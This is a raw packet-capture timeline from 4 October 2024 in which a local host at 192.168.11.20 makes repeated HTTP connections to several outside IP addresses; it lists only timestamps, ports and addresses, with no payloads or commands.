                                                                                                                                                    Oct 4, 2024 12:01:16.475518942 CEST804977691.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:16.475698948 CEST4977680192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:16.477073908 CEST4977680192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:16.658973932 CEST804977691.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:16.659085035 CEST804977691.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:16.659292936 CEST4977680192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:16.661170959 CEST4977680192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:16.842573881 CEST804977691.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:29.822829008 CEST4977780192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:30.004241943 CEST804977791.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:30.004417896 CEST4977780192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:30.005768061 CEST4977780192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:30.187117100 CEST804977791.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:30.187129974 CEST804977791.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:30.187289953 CEST4977780192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:31.509205103 CEST4977780192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:32.525192022 CEST4977880192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:32.706439972 CEST804977891.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:32.706626892 CEST4977880192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:32.708153009 CEST4977880192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:32.889719963 CEST804977891.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:32.889760971 CEST804977891.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:32.889888048 CEST4977880192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:34.210048914 CEST4977880192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:35.227607012 CEST4977980192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:35.409238100 CEST804977991.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:35.409410954 CEST4977980192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:35.410921097 CEST4977980192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:35.410973072 CEST4977980192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:35.592977047 CEST804977991.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:35.592995882 CEST804977991.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:35.593009949 CEST804977991.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:35.593019962 CEST804977991.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:35.593030930 CEST804977991.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:35.593043089 CEST804977991.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:35.593192101 CEST804977991.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:37.930090904 CEST4978080192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:38.111619949 CEST804978091.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:38.111794949 CEST4978080192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:38.113126040 CEST4978080192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:38.294991970 CEST804978091.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:38.295007944 CEST804978091.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:38.295267105 CEST4978080192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:38.297207117 CEST4978080192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:38.478843927 CEST804978091.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:43.303886890 CEST4978180192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:43.496571064 CEST8049781185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:43.496727943 CEST4978180192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:43.498101950 CEST4978180192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:43.690749884 CEST8049781185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:43.690882921 CEST8049781185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:43.690900087 CEST8049781185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:43.691054106 CEST4978180192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:45.004597902 CEST4978180192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:46.021997929 CEST4978280192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:46.214350939 CEST8049782185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:46.214503050 CEST4978280192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:46.215877056 CEST4978280192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:46.408169985 CEST8049782185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:46.408291101 CEST8049782185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:46.408303976 CEST8049782185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:46.408401966 CEST4978280192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:47.722795010 CEST4978280192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:48.740272999 CEST4978380192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:48.935056925 CEST8049783185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:48.935321093 CEST4978380192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:48.936840057 CEST4978380192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:48.936860085 CEST4978380192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:49.129507065 CEST8049783185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:49.129637003 CEST8049783185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:49.129652023 CEST8049783185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:49.129997969 CEST8049783185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:49.130125999 CEST8049783185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:49.130249023 CEST4978380192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:50.440988064 CEST4978380192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:51.458724022 CEST4978480192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:51.655621052 CEST8049784185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:51.655910969 CEST4978480192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:51.657408953 CEST4978480192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:51.853878975 CEST8049784185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:51.854226112 CEST8049784185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:51.854379892 CEST8049784185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:51.854397058 CEST8049784185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:51.854409933 CEST8049784185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:51.854533911 CEST8049784185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:51.854813099 CEST4978480192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:51.854813099 CEST4978480192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:51.858206987 CEST4978480192.168.11.20185.134.245.113
                                                                                                                                                    Oct 4, 2024 12:01:52.055877924 CEST8049784185.134.245.113192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:56.863384962 CEST4978580192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:01:56.963453054 CEST8049785184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:56.963601112 CEST4978580192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:01:56.964999914 CEST4978580192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:01:57.064975023 CEST8049785184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:57.074228048 CEST8049785184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:57.074249983 CEST8049785184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:57.074350119 CEST8049785184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:57.074362040 CEST8049785184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:57.074374914 CEST8049785184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:57.074385881 CEST8049785184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:57.074397087 CEST8049785184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:57.074400902 CEST4978580192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:01:57.074409008 CEST8049785184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:57.074419975 CEST8049785184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:57.074517012 CEST4978580192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:01:57.074517012 CEST4978580192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:01:57.074558020 CEST8049785184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:57.074565887 CEST4978580192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:01:57.074687004 CEST4978580192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:01:58.470433950 CEST4978580192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:01:59.487761021 CEST4978680192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:01:59.587897062 CEST8049786184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:59.588036060 CEST4978680192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:01:59.589422941 CEST4978680192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:01:59.689186096 CEST8049786184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:59.690645933 CEST8049786184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:59.690732956 CEST8049786184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:59.690747976 CEST8049786184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:59.690762997 CEST8049786184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:59.690774918 CEST8049786184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:59.690855026 CEST4978680192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:01:59.690911055 CEST8049786184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:59.691000938 CEST4978680192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:01:59.691029072 CEST8049786184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:59.691087961 CEST4978680192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:01:59.691169977 CEST8049786184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:59.691211939 CEST8049786184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:59.691260099 CEST8049786184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:59.691412926 CEST4978680192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:01:59.691466093 CEST4978680192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:02:01.094835997 CEST4978680192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:02:02.113019943 CEST4978780192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:02:02.213219881 CEST8049787184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:02.213357925 CEST4978780192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:02:02.214879036 CEST4978780192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:02:02.214931011 CEST4978780192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:02:02.314991951 CEST8049787184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:02.315006971 CEST8049787184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:02.315105915 CEST8049787184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:02.315118074 CEST8049787184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:02.315128088 CEST8049787184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:02.315136909 CEST8049787184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:02.318686008 CEST8049787184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:02.318715096 CEST8049787184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:02.318738937 CEST8049787184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:02.318779945 CEST8049787184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:02.318793058 CEST8049787184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:02.318805933 CEST8049787184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:02.318819046 CEST8049787184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:02.318857908 CEST8049787184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:02.318871021 CEST8049787184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:02.318905115 CEST8049787184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:02.318923950 CEST4978780192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:02:02.318973064 CEST4978780192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:02:02.319029093 CEST4978780192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:02:03.719232082 CEST4978780192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:02:04.736661911 CEST4978880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:02:04.837038040 CEST8049788184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:04.837268114 CEST4978880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:02:04.839783907 CEST4978880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:02:04.940325975 CEST8049788184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:04.940937996 CEST8049788184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:04.941031933 CEST8049788184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:04.941099882 CEST8049788184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:04.941164017 CEST8049788184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:04.941212893 CEST4978880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:02:04.941220045 CEST8049788184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:04.941277981 CEST8049788184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:04.941339970 CEST4978880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:02:04.941349030 CEST8049788184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:04.941406965 CEST8049788184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:04.941443920 CEST4978880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:02:04.941466093 CEST8049788184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:04.941529036 CEST8049788184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:04.941565990 CEST4978880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:02:04.941756964 CEST4978880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:02:04.945349932 CEST4978880192.168.11.20184.73.212.51
                                                                                                                                                    Oct 4, 2024 12:02:05.046246052 CEST8049788184.73.212.51192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:09.954432011 CEST4978980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:10.135735035 CEST8049789199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:10.136042118 CEST4978980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:10.137639999 CEST4978980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:10.318979025 CEST8049789199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:10.336822033 CEST8049789199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:10.336952925 CEST8049789199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:10.336982012 CEST8049789199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:10.337069988 CEST4978980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:10.337079048 CEST8049789199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:10.337095976 CEST8049789199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:10.337187052 CEST4978980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:10.337276936 CEST8049789199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:10.337291956 CEST8049789199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:10.337304115 CEST8049789199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:10.337408066 CEST8049789199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:10.337486029 CEST4978980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:10.337538004 CEST4978980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:10.337687016 CEST8049789199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:10.337824106 CEST4978980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:10.519228935 CEST8049789199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:10.519373894 CEST8049789199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:10.519388914 CEST8049789199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:10.519540071 CEST4978980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:10.519540071 CEST4978980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:11.639396906 CEST4978980192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:12.656739950 CEST4979080192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:12.839199066 CEST8049790199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:12.839394093 CEST4979080192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:12.840765953 CEST4979080192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:13.022027016 CEST8049790199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:13.048616886 CEST8049790199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:13.048737049 CEST8049790199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:13.048852921 CEST8049790199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:13.048966885 CEST8049790199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:13.048969984 CEST4979080192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:13.049119949 CEST8049790199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:13.049163103 CEST4979080192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:13.049236059 CEST8049790199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:13.049264908 CEST8049790199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:13.049330950 CEST8049790199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:13.049344063 CEST8049790199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:13.049369097 CEST4979080192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:13.049402952 CEST8049790199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:13.049593925 CEST4979080192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:13.230138063 CEST8049790199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:13.230154037 CEST8049790199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:13.230169058 CEST8049790199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:13.230376005 CEST4979080192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:14.341948032 CEST4979080192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:15.359580994 CEST4979180192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:15.540993929 CEST8049791199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:15.541193008 CEST4979180192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:15.542889118 CEST4979180192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:15.542936087 CEST4979180192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:15.724862099 CEST8049791199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:15.725231886 CEST8049791199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:15.725970030 CEST8049791199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:15.726231098 CEST8049791199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:15.750777960 CEST8049791199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:15.750863075 CEST8049791199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:15.751003981 CEST4979180192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:15.751024008 CEST8049791199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:15.751176119 CEST8049791199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:15.751192093 CEST8049791199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:15.751276016 CEST8049791199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:15.751316071 CEST4979180192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:15.751394033 CEST8049791199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:15.751408100 CEST8049791199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:15.751446009 CEST4979180192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:15.751537085 CEST4979180192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:15.752346992 CEST8049791199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:15.752501965 CEST8049791199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:15.753000975 CEST4979180192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:15.932434082 CEST8049791199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:15.932570934 CEST8049791199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:15.932585955 CEST8049791199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:15.932867050 CEST4979180192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:17.044446945 CEST4979180192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:18.061872005 CEST4979280192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:18.250248909 CEST8049792199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:18.250452995 CEST4979280192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:18.251822948 CEST4979280192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:18.438776970 CEST8049792199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:18.453294992 CEST8049792199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:18.453378916 CEST8049792199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:18.453533888 CEST8049792199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:18.453550100 CEST8049792199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:18.453634977 CEST4979280192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:18.453648090 CEST8049792199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:18.453733921 CEST8049792199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:18.453746080 CEST8049792199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:18.453749895 CEST4979280192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:18.453851938 CEST8049792199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:18.453921080 CEST4979280192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:18.453954935 CEST8049792199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:18.454051018 CEST4979280192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:18.454082012 CEST8049792199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:18.454296112 CEST4979280192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:18.638196945 CEST8049792199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:18.638310909 CEST8049792199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:18.638326883 CEST8049792199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:18.638525009 CEST4979280192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:18.638525009 CEST4979280192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:18.641695976 CEST4979280192.168.11.20199.192.19.19
                                                                                                                                                    Oct 4, 2024 12:02:18.826409101 CEST8049792199.192.19.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:23.654458046 CEST4979380192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:23.756297112 CEST804979313.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:23.756490946 CEST4979380192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:23.757869959 CEST4979380192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:23.858314991 CEST804979313.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:23.858526945 CEST804979313.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:23.858691931 CEST4979380192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:25.261445045 CEST4979380192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 12:02:25.362548113 CEST804979313.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:02:26.278913975 CEST4979480192.168.11.2013.248.169.48
